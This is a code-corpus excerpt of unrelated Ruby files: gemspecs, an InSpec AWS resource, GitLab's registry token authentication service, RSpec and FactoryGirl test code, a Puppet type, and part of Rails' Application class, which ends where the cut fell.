| 22.904762 | 65 | 0.683992 |
1db32ed4e01dcdd85a7e6b40bf8a128cc3214f8b | 1,343 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
Gem::Specification.new do |spec|
spec.name = 'aws-sdk-apigatewaymanagementapi'
spec.version = File.read(File.expand_path('../VERSION', __FILE__)).strip
spec.summary = 'AWS SDK for Ruby - AmazonApiGatewayManagementApi'
spec.description = 'Official AWS Ruby gem for AmazonApiGatewayManagementApi. This gem is part of the AWS SDK for Ruby.'
spec.author = 'Amazon Web Services'
spec.homepage = 'https://github.com/aws/aws-sdk-ruby'
spec.license = 'Apache-2.0'
spec.email = ['[email protected]']
spec.require_paths = ['lib']
spec.files = Dir['LICENSE.txt', 'CHANGELOG.md', 'VERSION', 'lib/**/*.rb']
spec.metadata = {
'source_code_uri' => 'https://github.com/aws/aws-sdk-ruby/tree/version-3/gems/aws-sdk-apigatewaymanagementapi',
'changelog_uri' => 'https://github.com/aws/aws-sdk-ruby/tree/version-3/gems/aws-sdk-apigatewaymanagementapi/CHANGELOG.md'
}
spec.add_dependency('aws-sdk-core', '~> 3', '>= 3.125.0')
spec.add_dependency('aws-sigv4', '~> 1.1')
spec.required_ruby_version = '>= 2.3'
end
| 40.69697 | 127 | 0.685778 |
2181af2e7eff49f4ff99db5fbebed1b44d77d2c6 | 1,058 | # frozen_string_literal: true
require 'aws_backend'
class AWSMQConfiguration < AwsResourceBase
name 'aws_mq_configuration'
desc 'Describes a Amazon MQ configuration.'
example "
describe aws_mq_configuration(configuration_id: 'test1') do
it { should exist }
end
"
def initialize(opts = {})
opts = { configuration_id: opts } if opts.is_a?(String)
super(opts)
validate_parameters(required: [:configuration_id])
raise ArgumentError, "#{@__resource_name__}: configuration_id must be provided" unless opts[:configuration_id] && !opts[:configuration_id].empty?
@display_name = opts[:configuration_id]
resp = @aws.mq_client.describe_configuration({ configuration_id: opts[:configuration_id] })
@configurations = resp.to_h
create_resource_methods(@configurations)
end
def configuration_id
return nil unless exists?
@configurations[:configuration_id]
end
def exists?
[email protected]? && [email protected]?
end
def to_s
"Configuration ID: #{@display_name}"
end
end
| 26.45 | 149 | 0.725898 |
4a699fe32130a046f51c672fa8f0608c6a976963 | 7,056 | # frozen_string_literal: true
module Auth
class ContainerRegistryAuthenticationService < BaseService
AUDIENCE = 'container_registry'
REGISTRY_LOGIN_ABILITIES = [
:read_container_image,
:create_container_image,
:destroy_container_image,
:update_container_image,
:admin_container_image,
:build_read_container_image,
:build_create_container_image,
:build_destroy_container_image
].freeze
def execute(authentication_abilities:)
@authentication_abilities = authentication_abilities
return error('UNAVAILABLE', status: 404, message: 'registry not enabled') unless registry.enabled
return error('DENIED', status: 403, message: 'access forbidden') unless has_registry_ability?
unless scopes.any? || current_user || project
return error('DENIED', status: 403, message: 'access forbidden')
end
{ token: authorized_token(*scopes).encoded }
end
def self.full_access_token(*names)
access_token(%w(*), names)
end
def self.pull_access_token(*names)
access_token(['pull'], names)
end
def self.access_token(actions, names)
names = names.flatten
registry = Gitlab.config.registry
token = JSONWebToken::RSAToken.new(registry.key)
token.issuer = registry.issuer
token.audience = AUDIENCE
token.expire_time = token_expire_at
token[:access] = names.map do |name|
{ type: 'repository', name: name, actions: actions }
end
token.encoded
end
def self.token_expire_at
Time.now + Gitlab::CurrentSettings.container_registry_token_expire_delay.minutes
end
private
def authorized_token(*accesses)
JSONWebToken::RSAToken.new(registry.key).tap do |token|
token.issuer = registry.issuer
token.audience = params[:service]
token.subject = current_user.try(:username)
token.expire_time = self.class.token_expire_at
token[:access] = accesses.compact
end
end
def scopes
return [] unless params[:scopes]
@scopes ||= params[:scopes].map do |scope|
process_scope(scope)
end.compact
end
def process_scope(scope)
type, name, actions = scope.split(':', 3)
actions = actions.split(',')
case type
when 'registry'
process_registry_access(type, name, actions)
when 'repository'
path = ContainerRegistry::Path.new(name)
process_repository_access(type, path, actions)
end
end
def process_registry_access(type, name, actions)
return unless current_user&.admin?
return unless name == 'catalog'
return unless actions == ['*']
{ type: type, name: name, actions: ['*'] }
end
def process_repository_access(type, path, actions)
return unless path.valid?
requested_project = path.repository_project
return unless requested_project
actions = actions.select do |action|
can_access?(requested_project, action)
end
return unless actions.present?
# At this point user/build is already authenticated.
#
ensure_container_repository!(path, actions)
{ type: type, name: path.to_s, actions: actions }
end
##
# Because we do not have two way communication with registry yet,
# we create a container repository image resource when push to the
# registry is successfully authorized.
#
def ensure_container_repository!(path, actions)
return if path.has_repository?
return unless actions.include?('push')
ContainerRepository.create_from_path!(path)
end
def can_access?(requested_project, requested_action)
return false unless requested_project.container_registry_enabled?
case requested_action
when 'pull'
build_can_pull?(requested_project) || user_can_pull?(requested_project) || deploy_token_can_pull?(requested_project)
when 'push'
build_can_push?(requested_project) || user_can_push?(requested_project) || deploy_token_can_push?(requested_project)
when 'delete'
build_can_delete?(requested_project) || user_can_admin?(requested_project)
when '*'
user_can_admin?(requested_project)
else
false
end
end
def build_can_delete?(requested_project)
# Build can delete only from the project from which it originates
has_authentication_ability?(:build_destroy_container_image) &&
requested_project == project
end
def registry
Gitlab.config.registry
end
def can_user?(ability, project)
user = current_user.is_a?(User) ? current_user : nil
can?(user, ability, project)
end
def build_can_pull?(requested_project)
# Build can:
# 1. pull from its own project (for ex. a build)
# 2. read images from dependent projects if creator of build is a team member
has_authentication_ability?(:build_read_container_image) &&
(requested_project == project || can_user?(:build_read_container_image, requested_project))
end
def user_can_admin?(requested_project)
has_authentication_ability?(:admin_container_image) &&
can_user?(:admin_container_image, requested_project)
end
def user_can_pull?(requested_project)
has_authentication_ability?(:read_container_image) &&
can_user?(:read_container_image, requested_project)
end
def deploy_token_can_pull?(requested_project)
has_authentication_ability?(:read_container_image) &&
current_user.is_a?(DeployToken) &&
current_user.has_access_to?(requested_project) &&
current_user.read_registry?
end
def deploy_token_can_push?(requested_project)
has_authentication_ability?(:create_container_image) &&
current_user.is_a?(DeployToken) &&
current_user.has_access_to?(requested_project) &&
current_user.write_registry?
end
##
# We still support legacy pipeline triggers which do not have associated
# actor. New permissions model and new triggers are always associated with
# an actor. So this should be improved once
# https://gitlab.com/gitlab-org/gitlab-foss/issues/37452 is resolved.
#
def build_can_push?(requested_project)
# Build can push only to the project from which it originates
has_authentication_ability?(:build_create_container_image) &&
requested_project == project
end
def user_can_push?(requested_project)
has_authentication_ability?(:create_container_image) &&
can_user?(:create_container_image, requested_project)
end
def error(code, status:, message: '')
{ errors: [{ code: code, message: message }], http_status: status }
end
def has_authentication_ability?(capability)
@authentication_abilities.to_a.include?(capability)
end
def has_registry_ability?
@authentication_abilities.any? do |ability|
REGISTRY_LOGIN_ABILITIES.include?(ability)
end
end
end
end
| 31.0837 | 124 | 0.692035 |
acc6231dd291d6f7baf91699191c82c72b4b5362 | 213 | class <%= redemption_class_name %> < ActiveRecord::Base
belongs_to :<%= singular_name %>, :counter_cache => 'redemptions_count'
belongs_to :user
validates_presence_of :user_id, :<%= singular_name %>_id
end
| 30.428571 | 73 | 0.732394 |
6aa54b0be1d4ff9b69fa8974648bd6636d4d481c | 2,929 | RSpec.describe Harvest::Api::Resources::TimeEntries do
subject do
described_class.new(access_token: ENV['HARVEST_ACCESS_TOKEN'],
account_id: ENV['HARVEST_ACCOUNT_ID'])
end
let(:time_entry_attributes) do
%w(id spent_date hours notes is_locked locked_reason is_closed is_billed
timer_started_at started_time ended_time is_running billable budgeted
billable_rate cost_rate created_at updated_at user client project task
user_assignment task_assignment invoice external_reference)
end
describe "#all" do
it "returns an array" do
VCR.use_cassette("time_entries/all") do
time_entries = subject.all
expect(time_entries).to be_kind_of(Array)
end
end
it 'returns hashes with the correct attributes' do
VCR.use_cassette("time_entries/all") do
expect(subject.all.first.keys).to match_array(time_entry_attributes)
end
end
context 'when a page is passed as parameter' do
it 'adds the given page to request query' do
options = { options: { query: { page: 1, per_page: 100 } } }
expect(subject).to receive(:get_collection).
with('/time_entries', options).and_call_original
VCR.use_cassette("time_entries/all_page_1") do
subject.all(page: 1)
end
end
context 'and there is no time entries in the given page' do
it 'returns an empty array' do
VCR.use_cassette("time_entries/all_page_2_empty") do
expect(subject.all(page: 2)).to be_empty
end
end
end
end
end
describe "#find" do
let(:id) { subject.all.first['id'] }
it "returns a Hash" do
VCR.use_cassette('time_entries/found') do
time_entry = subject.find(id)
expect(time_entry).to be_kind_of(Hash)
end
end
it "returns the correct attributes in the Hash" do
VCR.use_cassette('time_entries/found') do
expect(subject.find(id).keys).to match_array(time_entry_attributes)
end
end
context "when no time entry is found with the given id" do
it "raises a not found error" do
VCR.use_cassette('time_entries/not_found') do
expect {
subject.find('0')
}.to raise_error(Harvest::Api::Errors::NotFoundError)
end
end
end
end
describe "#in_period" do
let(:to) { Date.parse('2018-06-26') }
let(:from) { to - 10 }
it "returns the same object as response" do
expect(subject.in_period(from, to)).to eq(subject)
end
it "adds the period to the request query before performing it" do
options = { query: { from: from, to: to, page: 1, per_page: 100 } }
expect(subject).to receive(:get_collection).
with('/time_entries', options: options).and_call_original
VCR.use_cassette('time_entries/in_period') do
subject.in_period(from, to).all
end
end
end
end
| 29.887755 | 76 | 0.656197 |
219865cbb54f7f0142e33a8bb7c0ece28d7314a8 | 326 | FactoryGirl.define do
factory :application_token do
sequence :application do |i|
"application #{i}"
end
# the plain token is application
token_salt { BCrypt::Engine.generate_salt }
token_hash { BCrypt::Engine.hash_secret(application, token_salt) }
association :user, factory: :user
end
end
| 23.285714 | 70 | 0.702454 |
18ebb13414eaf6c664dad60013b9e71ce624c625 | 934 | # frozen_string_literal: true
lib = File.expand_path('lib', __dir__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'cross_table/version'
Gem::Specification.new do |spec|
spec.name = 'cross_table'
spec.version = CrossTable::VERSION
spec.authors = ['masa.kunikata']
spec.email = ['[email protected]']
spec.summary = 'cross tabulation "pivot table" utility'
spec.homepage = 'https://github.com/masa-kunikata/cross_table'
spec.license = 'MIT'
spec.files = Dir.chdir(__dir__) do
`git ls-files -z`.split("\x0").reject do |f|
f.match(%r{^(test|spec|features)/})
end
end
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ['lib']
spec.add_development_dependency 'bundler', '~> 2.0'
spec.add_development_dependency 'rake', '~> 13.0'
spec.required_ruby_version = '>= 2.5'
end
| 32.206897 | 74 | 0.648822 |
014d9750ec33ba72a54d0fc6940976e0f609876b | 7,934 | # encoding: utf-8
#
# Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
require File.expand_path("../spec_helper", __FILE__)
describe Selenium::Client::Extensions do
class ExtensionsClient
include Selenium::Client::Extensions
end
let(:client) { ExtensionsClient.new }
describe "#wait_for_text" do
it "waits for the innerHTML content of an element when a locator is provided" do
client.should_receive(:wait_for_condition).with(/findElement\('a_locator'\)/, anything)
client.wait_for_text "some text", :element => "a_locator"
end
it "waits for the page content when no locator is provided" do
client.should_receive(:wait_for_condition).with(%r{document.body.innerHTML.match\(/some text/\)}m, anything)
client.wait_for_text "some text"
end
it "waits for the page content regexp when no locator is provided" do
client.should_receive(:wait_for_condition).with(%r{document.body.innerHTML.match\(/some text/\)}m, anything)
client.wait_for_text(/some text/)
end
it "uses default timeout when none is provided" do
client.should_receive(:wait_for_condition).with(anything, nil)
client.wait_for_text "some text"
end
it "uses explicit timeout when provided" do
client.should_receive(:wait_for_condition).with(anything, :explicit_timeout)
client.wait_for_text "some text", :timeout_in_seconds => :explicit_timeout
end
end
describe "#wait_for_no_text" do
it "waits for the innerHTML content of an element when a locator is provided" do
client.should_receive(:wait_for_condition).with(/findElement\('a_locator'\)/, anything)
client.wait_for_no_text "some text", :element => "a_locator"
end
it "waits for the page content for regexp when no locator is provided" do
client.should_receive(:wait_for_condition).with(%r{document.body.innerHTML.match\(/some text/\)}m, anything)
client.wait_for_no_text(/some text/)
end
it "waits for the page content when no locator is provided" do
client.should_receive(:wait_for_condition).with(%r{document.body.innerHTML.match\(/some text/\)}m, anything)
client.wait_for_no_text "some text"
end
it "uses default timeout when none is provided" do
client.should_receive(:wait_for_condition).with(anything, nil)
client.wait_for_no_text "some text"
end
it "uses explicit timeout when provided" do
client.should_receive(:wait_for_condition).with(anything, :explicit_timeout)
client.wait_for_no_text "some text", :timeout_in_seconds => :explicit_timeout
end
end
describe "#wait_for_ajax" do
it "uses Ajax.activeRequestCount when default js framework is prototype" do
client.stub(:default_javascript_framework).and_return(:prototype)
client.should_receive(:wait_for_condition).with("selenium.browserbot.getCurrentWindow().Ajax.activeRequestCount == 0;", anything)
client.wait_for_ajax
end
it "uses jQuery.active when default js framework is jQuery" do
client.stub(:default_javascript_framework).and_return(:jquery)
client.should_receive(:wait_for_condition).with("selenium.browserbot.getCurrentWindow().jQuery.active == 0;", anything)
client.wait_for_ajax
end
it "can override default js framework" do
client.stub(:default_javascript_framework).and_return(:prototype)
client.should_receive(:wait_for_condition).with("selenium.browserbot.getCurrentWindow().jQuery.active == 0;", anything)
client.wait_for_ajax :javascript_framework => :jquery
end
it "uses default timeout when none is provided" do
client.stub(:default_javascript_framework).and_return(:prototype)
client.should_receive(:wait_for_condition).with(anything, nil)
client.wait_for_ajax
end
it "uses explicit timeout when provided" do
client.stub(:default_javascript_framework).and_return(:prototype)
client.should_receive(:wait_for_condition).with(anything, :explicit_timeout)
client.wait_for_ajax :timeout_in_seconds => :explicit_timeout
end
end
describe "#wait_for_effect" do
it "uses Effect.Queue.size() when default js framework is prototype" do
client.stub(:default_javascript_framework).and_return(:prototype)
client.should_receive(:wait_for_condition).with("selenium.browserbot.getCurrentWindow().Effect.Queue.size() == 0;", anything)
client.wait_for_effects
end
it "uses default timeout when none is provided" do
client.stub(:default_javascript_framework).and_return(:prototype)
client.should_receive(:wait_for_condition).with(anything, nil)
client.wait_for_effects
end
it "uses explicit timeout when provided" do
client.stub(:default_javascript_framework).and_return(:prototype)
client.should_receive(:wait_for_condition).with(anything, :explicit_timeout)
client.wait_for_effects :timeout_in_seconds => :explicit_timeout
end
end
describe "#wait_for_field_value" do
it "uses provided locator" do
client.should_receive(:wait_for_condition).with(/findElement\('a_locator'\)/, anything)
client.wait_for_field_value "a_locator", "a value"
end
it "uses provided field value" do
client.should_receive(:wait_for_condition).with(/element.value == 'a value'/, anything)
client.wait_for_field_value "a_locator", "a value"
end
it "uses explicit timeout when provided" do
client.should_receive(:wait_for_condition).with(anything, :the_timeout)
client.wait_for_field_value "a_locator", "a value", :timeout_in_seconds => :the_timeout
end
end
describe "#wait_for_no_field_value" do
it "uses provided locator" do
client.should_receive(:wait_for_condition).with(/findElement\('a_locator'\)/, anything)
client.wait_for_no_field_value "a_locator", "a value"
end
it "uses provided field value" do
client.should_receive(:wait_for_condition).with(/element.value != 'a value'/, anything)
client.wait_for_no_field_value "a_locator", "a value"
end
it "uses explicit timeout when provided" do
client.should_receive(:wait_for_condition).with(anything, :the_timeout)
client.wait_for_no_field_value "a_locator", "a value", :timeout_in_seconds => :the_timeout
end
end
describe "#wait_for_visible" do
it "uses provided locator" do
client.should_receive(:wait_for_condition).with("selenium.isVisible('a_locator')", anything)
client.wait_for_visible "a_locator"
end
it "uses explicit timeout when provided" do
client.should_receive(:wait_for_condition).with(anything, :the_timeout)
client.wait_for_visible "a_locator", :timeout_in_seconds => :the_timeout
end
end
describe "#wait_for_not_visible" do
it "uses provided locator" do
client.should_receive(:wait_for_condition).with("!selenium.isVisible('a_locator')", anything)
client.wait_for_not_visible "a_locator"
end
it "uses explicit timeout when provided" do
client.should_receive(:wait_for_condition).with(anything, :the_timeout)
client.wait_for_not_visible "a_locator", :timeout_in_seconds => :the_timeout
end
end
end
| 40.896907 | 135 | 0.738593 |
08e3f9500dcfdcab9e9fb767fe205338f24dd6e1 | 79 | class TWEnv::Error < RuntimeError
ArchiveNotFoundError = Class.new(self)
end
| 19.75 | 40 | 0.78481 |
28dd3f97c959f14e6734484cdb4e8e4abff45a70 | 1,052 | Puppet::Type.newtype(:neutron_vpnaas_service_config) do
ensurable
newparam(:name, :namevar => true) do
desc 'Section/setting name to manage from neutron_vpnaas.conf'
newvalues(/\S+\/\S+/)
end
newproperty(:value, :array_matching => :all) do
desc 'The value of the setting to be defined.'
def insync?(is)
return true if @should.empty?
return false unless is.is_a? Array
return false unless is.length == @should.length
# we don't care about the order of items in array, hence
# it is necessary to override insync
return (
is & @should == is or
is & @should.map(&:to_s) == is
)
end
munge do |value|
value = value.to_s.strip
value.capitalize! if value =~ /^(true|false)$/i
value
end
end
newparam(:ensure_absent_val) do
desc 'A value that is specified as the value property will behave as if ensure => absent was specified'
defaultto('<SERVICE DEFAULT>')
end
autorequire(:anchor) do
['neutron::install::end']
end
end
| 25.658537 | 107 | 0.642586 |
0333dd2f3c0ab707753df0a52a7e4ecc8be1a05c | 236 | require 'habitat'
require 'jungle_organism_factory'
require 'pond_organism_factory'
jungle = Habitat.new(1, 4, JungleOrganismFactory.new)
jungle.simulate_one_day
pond = Habitat.new(3, 2, PondOrganismFactory.new)
pond.simulate_one_day
| 23.6 | 53 | 0.822034 |
e2d6123ac990df5e23eca894eb3611f81c22a861 | 164 | require 'rails_helper'
module Cmor::Galleries
RSpec.describe PictureDetail, type: :model do
pending "add some examples to (or delete) #{__FILE__}"
end
end
| 20.5 | 58 | 0.737805 |
38dadb38d80dde47746bc2220514c385995eb841 | 22,633 | # frozen_string_literal: true
require "yaml"
require "active_support/core_ext/hash/keys"
require "active_support/core_ext/object/blank"
require "active_support/key_generator"
require "active_support/message_verifier"
require "active_support/encrypted_configuration"
require "active_support/deprecation"
require "rails/engine"
require "rails/secrets"
module Rails
# An Engine with the responsibility of coordinating the whole boot process.
#
# == Initialization
#
# Rails::Application is responsible for executing all railties and engines
# initializers. It also executes some bootstrap initializers (check
# Rails::Application::Bootstrap) and finishing initializers, after all the others
# are executed (check Rails::Application::Finisher).
#
# == Configuration
#
# Besides providing the same configuration as Rails::Engine and Rails::Railtie,
# the application object has several specific configurations, for example
# "cache_classes", "consider_all_requests_local", "filter_parameters",
# "logger" and so forth.
#
# Check Rails::Application::Configuration to see them all.
#
# == Routes
#
# The application object is also responsible for holding the routes and reloading routes
# whenever the files change in development.
#
# == Middlewares
#
# The Application is also responsible for building the middleware stack.
#
# == Booting process
#
# The application is also responsible for setting up and executing the booting
# process. From the moment you require "config/application.rb" in your app,
# the booting process goes like this:
#
# 1) require "config/boot.rb" to setup load paths
# 2) require railties and engines
# 3) Define Rails.application as "class MyApp::Application < Rails::Application"
# 4) Run config.before_configuration callbacks
# 5) Load config/environments/ENV.rb
# 6) Run config.before_initialize callbacks
# 7) Run Railtie#initializer defined by railties, engines and application.
# One by one, each engine sets up its load paths, routes and runs its config/initializers/* files.
# 8) Custom Railtie#initializers added by railties, engines and applications are executed
# 9) Build the middleware stack and run to_prepare callbacks
# 10) Run config.before_eager_load and eager_load! if eager_load is true
# 11) Run config.after_initialize callbacks
#
# == Multiple Applications
#
# If you decide to define multiple applications, then the first application
# that is initialized will be set to +Rails.application+, unless you override
# it with a different application.
#
# To create a new application, you can instantiate a new instance of a class
# that has already been created:
#
# class Application < Rails::Application
# end
#
# first_application = Application.new
# second_application = Application.new(config: first_application.config)
#
# In the above example, the configuration from the first application was used
# to initialize the second application. You can also use the +initialize_copy+
# on one of the applications to create a copy of the application which shares
# the configuration.
#
# If you decide to define Rake tasks, runners, or initializers in an
# application other than +Rails.application+, then you must run them manually.
class Application < Engine
autoload :Bootstrap, "rails/application/bootstrap"
autoload :Configuration, "rails/application/configuration"
autoload :DefaultMiddlewareStack, "rails/application/default_middleware_stack"
autoload :Finisher, "rails/application/finisher"
autoload :Railties, "rails/engine/railties"
autoload :RoutesReloader, "rails/application/routes_reloader"
class << self
def inherited(base)
super
Rails.app_class = base
add_lib_to_load_path!(find_root(base.called_from))
ActiveSupport.run_load_hooks(:before_configuration, base)
end
def instance
super.run_load_hooks!
end
def create(initial_variable_values = {}, &block)
new(initial_variable_values, &block).run_load_hooks!
end
def find_root(from)
find_root_with_flag "config.ru", from, Dir.pwd
end
# Makes the +new+ method public.
#
# Note that Rails::Application inherits from Rails::Engine, which
# inherits from Rails::Railtie and the +new+ method on Rails::Railtie is
# private
public :new
end
attr_accessor :assets, :sandbox
alias_method :sandbox?, :sandbox
attr_reader :reloaders, :reloader, :executor
delegate :default_url_options, :default_url_options=, to: :routes
INITIAL_VARIABLES = [:config, :railties, :routes_reloader, :reloaders,
:routes, :helpers, :app_env_config, :secrets] # :nodoc:
def initialize(initial_variable_values = {}, &block)
super()
@initialized = false
@reloaders = []
@routes_reloader = nil
@app_env_config = nil
@ordered_railties = nil
@railties = nil
@message_verifiers = {}
@ran_load_hooks = false
@executor = Class.new(ActiveSupport::Executor)
@reloader = Class.new(ActiveSupport::Reloader)
@reloader.executor = @executor
# are these actually used?
@initial_variable_values = initial_variable_values
@block = block
end
# Returns true if the application is initialized.
def initialized?
@initialized
end
def run_load_hooks! # :nodoc:
return self if @ran_load_hooks
@ran_load_hooks = true
@initial_variable_values.each do |variable_name, value|
if INITIAL_VARIABLES.include?(variable_name)
instance_variable_set("@#{variable_name}", value)
end
end
instance_eval(&@block) if @block
self
end
# Reload application routes regardless if they changed or not.
def reload_routes!
routes_reloader.reload!
end
# Returns the application's KeyGenerator
def key_generator
# number of iterations selected based on consultation with the google security
# team. Details at https://github.com/rails/rails/pull/6952#issuecomment-7661220
@caching_key_generator ||=
if secret_key_base
ActiveSupport::CachingKeyGenerator.new(
ActiveSupport::KeyGenerator.new(secret_key_base, iterations: 1000)
)
else
ActiveSupport::LegacyKeyGenerator.new(secrets.secret_token)
end
end
# Returns a message verifier object.
#
# This verifier can be used to generate and verify signed messages in the application.
#
# It is recommended not to use the same verifier for different things, so you can get different
# verifiers passing the +verifier_name+ argument.
#
# ==== Parameters
#
# * +verifier_name+ - the name of the message verifier.
#
# ==== Examples
#
# message = Rails.application.message_verifier('sensitive_data').generate('my sensible data')
# Rails.application.message_verifier('sensitive_data').verify(message)
# # => 'my sensible data'
#
# See the +ActiveSupport::MessageVerifier+ documentation for more information.
def message_verifier(verifier_name)
@message_verifiers[verifier_name] ||= begin
secret = key_generator.generate_key(verifier_name.to_s)
ActiveSupport::MessageVerifier.new(secret)
end
end
# Convenience for loading config/foo.yml for the current Rails env.
#
# Example:
#
# # config/exception_notification.yml:
# production:
# url: http://127.0.0.1:8080
# namespace: my_app_production
# development:
# url: http://localhost:3001
# namespace: my_app_development
#
# # config/environments/production.rb
# Rails.application.configure do
# config.middleware.use ExceptionNotifier, config_for(:exception_notification)
# end
def config_for(name, env: Rails.env)
if name.is_a?(Pathname)
yaml = name
else
yaml = Pathname.new("#{paths["config"].existent.first}/#{name}.yml")
end
if yaml.exist?
require "erb"
(YAML.load(ERB.new(yaml.read).result) || {})[env] || {}
else
raise "Could not load configuration. No such file - #{yaml}"
end
rescue Psych::SyntaxError => e
raise "YAML syntax error occurred while parsing #{yaml}. " \
"Please note that YAML must be consistently indented using spaces. Tabs are not allowed. " \
"Error: #{e.message}"
end
# Stores some of the Rails initial environment parameters which
# will be used by middlewares and engines to configure themselves.
def env_config
@app_env_config ||= begin
super.merge(
"action_dispatch.parameter_filter" => config.filter_parameters,
"action_dispatch.redirect_filter" => config.filter_redirect,
"action_dispatch.secret_token" => secrets.secret_token,
"action_dispatch.secret_key_base" => secret_key_base,
"action_dispatch.show_exceptions" => config.action_dispatch.show_exceptions,
"action_dispatch.show_detailed_exceptions" => config.consider_all_requests_local,
"action_dispatch.logger" => Rails.logger,
"action_dispatch.backtrace_cleaner" => Rails.backtrace_cleaner,
"action_dispatch.key_generator" => key_generator,
"action_dispatch.http_auth_salt" => config.action_dispatch.http_auth_salt,
"action_dispatch.signed_cookie_salt" => config.action_dispatch.signed_cookie_salt,
"action_dispatch.encrypted_cookie_salt" => config.action_dispatch.encrypted_cookie_salt,
"action_dispatch.encrypted_signed_cookie_salt" => config.action_dispatch.encrypted_signed_cookie_salt,
"action_dispatch.authenticated_encrypted_cookie_salt" => config.action_dispatch.authenticated_encrypted_cookie_salt,
"action_dispatch.use_authenticated_cookie_encryption" => config.action_dispatch.use_authenticated_cookie_encryption,
"action_dispatch.encrypted_cookie_cipher" => config.action_dispatch.encrypted_cookie_cipher,
"action_dispatch.signed_cookie_digest" => config.action_dispatch.signed_cookie_digest,
"action_dispatch.cookies_serializer" => config.action_dispatch.cookies_serializer,
"action_dispatch.cookies_digest" => config.action_dispatch.cookies_digest,
"action_dispatch.cookies_rotations" => config.action_dispatch.cookies_rotations,
"action_dispatch.content_security_policy" => config.content_security_policy,
"action_dispatch.content_security_policy_report_only" => config.content_security_policy_report_only,
"action_dispatch.content_security_policy_nonce_generator" => config.content_security_policy_nonce_generator
)
end
end
# If you try to define a set of Rake tasks on the instance, these will get
# passed up to the Rake tasks defined on the application's class.
def rake_tasks(&block)
self.class.rake_tasks(&block)
end
# Sends the initializers to the +initializer+ method defined in the
# Rails::Initializable module. Each Rails::Application class has its own
# set of initializers, as defined by the Initializable module.
def initializer(name, opts = {}, &block)
self.class.initializer(name, opts, &block)
end
# Sends any runner called in the instance of a new application up
# to the +runner+ method defined in Rails::Railtie.
def runner(&blk)
self.class.runner(&blk)
end
# Sends any console called in the instance of a new application up
# to the +console+ method defined in Rails::Railtie.
def console(&blk)
self.class.console(&blk)
end
# Sends any generators called in the instance of a new application up
# to the +generators+ method defined in Rails::Railtie.
def generators(&blk)
self.class.generators(&blk)
end
# Sends the +isolate_namespace+ method up to the class method.
def isolate_namespace(mod)
self.class.isolate_namespace(mod)
end
## Rails internal API
# This method is called just after an application inherits from Rails::Application,
# allowing the developer to load classes in lib and use them during application
# configuration.
#
# class MyApplication < Rails::Application
# require "my_backend" # in lib/my_backend
# config.i18n.backend = MyBackend
# end
#
# Notice this method takes into consideration the default root path. So if you
# are changing config.root inside your application definition or having a custom
# Rails application, you will need to add lib to $LOAD_PATH on your own in case
# you need to load files in lib/ during the application configuration as well.
def self.add_lib_to_load_path!(root) #:nodoc:
path = File.join root, "lib"
if File.exist?(path) && !$LOAD_PATH.include?(path)
$LOAD_PATH.unshift(path)
end
end
def require_environment! #:nodoc:
environment = paths["config/environment"].existent.first
require environment if environment
end
def routes_reloader #:nodoc:
@routes_reloader ||= RoutesReloader.new
end
# Returns an array of file paths appended with a hash of
# directories-extensions suitable for ActiveSupport::FileUpdateChecker
# API.
def watchable_args #:nodoc:
files, dirs = config.watchable_files.dup, config.watchable_dirs.dup
ActiveSupport::Dependencies.autoload_paths.each do |path|
dirs[path.to_s] = [:rb]
end
[files, dirs]
end
# Initialize the application passing the given group. By default, the
# group is :default
def initialize!(group = :default) #:nodoc:
raise "Application has been already initialized." if @initialized
run_initializers(group, self)
@initialized = true
self
end
def initializers #:nodoc:
Bootstrap.initializers_for(self) +
railties_initializers(super) +
Finisher.initializers_for(self)
end
def config #:nodoc:
@config ||= Application::Configuration.new(self.class.find_root(self.class.called_from))
end
def config=(configuration) #:nodoc:
@config = configuration
end
# Returns secrets added to config/secrets.yml.
#
# Example:
#
# development:
# secret_key_base: 836fa3665997a860728bcb9e9a1e704d427cfc920e79d847d79c8a9a907b9e965defa4154b2b86bdec6930adbe33f21364523a6f6ce363865724549fdfc08553
# test:
# secret_key_base: 5a37811464e7d378488b0f073e2193b093682e4e21f5d6f3ae0a4e1781e61a351fdc878a843424e81c73fb484a40d23f92c8dafac4870e74ede6e5e174423010
# production:
# secret_key_base: <%= ENV["SECRET_KEY_BASE"] %>
# namespace: my_app_production
#
# +Rails.application.secrets.namespace+ returns +my_app_production+ in the
# production environment.
def secrets
@secrets ||= begin
secrets = ActiveSupport::OrderedOptions.new
files = config.paths["config/secrets"].existent
files = files.reject { |path| path.end_with?(".enc") } unless config.read_encrypted_secrets
secrets.merge! Rails::Secrets.parse(files, env: Rails.env)
# Fallback to config.secret_key_base if secrets.secret_key_base isn't set
secrets.secret_key_base ||= config.secret_key_base
# Fallback to config.secret_token if secrets.secret_token isn't set
secrets.secret_token ||= config.secret_token
if secrets.secret_token.present?
ActiveSupport::Deprecation.warn(
"`secrets.secret_token` is deprecated in favor of `secret_key_base` and will be removed in Rails 6.0."
)
end
secrets
end
end
def secrets=(secrets) #:nodoc:
@secrets = secrets
end
# The secret_key_base is used as the input secret to the application's key generator, which in turn
# is used to create all MessageVerifiers/MessageEncryptors, including the ones that sign and encrypt cookies.
#
# In test and development, this is simply derived as a MD5 hash of the application's name.
#
# In all other environments, we look for it first in ENV["SECRET_KEY_BASE"],
# then credentials.secret_key_base, and finally secrets.secret_key_base. For most applications,
# the correct place to store it is in the encrypted credentials file.
def secret_key_base
if Rails.env.development? || Rails.env.test?
secrets.secret_key_base ||= generate_development_secret
else
validate_secret_key_base(
ENV["SECRET_KEY_BASE"] || credentials.secret_key_base || secrets.secret_key_base
)
end
end
# Decrypts the credentials hash as kept in +config/credentials.yml.enc+. This file is encrypted with
# the Rails master key, which is either taken from <tt>ENV["RAILS_MASTER_KEY"]</tt> or from loading
# +config/master.key+.
def credentials
@credentials ||= encrypted("config/credentials.yml.enc")
end
